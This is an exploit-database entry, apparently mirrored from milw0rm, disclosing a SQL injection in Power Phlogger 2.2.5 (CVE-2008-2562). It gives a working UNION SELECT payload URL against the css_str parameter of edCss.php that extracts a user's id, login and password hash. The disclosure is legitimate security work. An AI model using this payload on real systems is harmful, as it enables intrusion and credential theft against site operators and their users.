[] NeoSense
E X P L O I T S
title author type platform port cve id

Power Phlogger 2.2.5 - 'css_str' SQL Injection

Author: MustLive
type: webapps
platform: php
port: 
date_added: 2008-06-04 
date_updated: 2016-12-05 
verified: 1 
codes: OSVDB-45976;CVE-2008-2562 
tags: 
aliases:  
screenshot_url:  
application_url: 
############################################################

SQL Injection vulnerability in Power Phlogger

By MustLive (http://websecurity.com.ua)

Detailed information: http://websecurity.com.ua/2158/

Description: SQL Injection vulnerability in Power Phlogger (it is PHP/MySQL logging tool via counters). To make SQL Injection attack you need to be logged into your account, which can be freely obtained via open registration form.

SQL Injection:

http://site/edCss.php?css_str=-1%20union%20select%20null,null,id,username,pw,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20pphl_users%20limit%200,1&action=edit

With this query you will receive id, login and password (hash) of first user.

Vulnerable versions are Power Phlogger <= 2.2.5.

############################################################

# milw0rm.com [2008-06-05]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.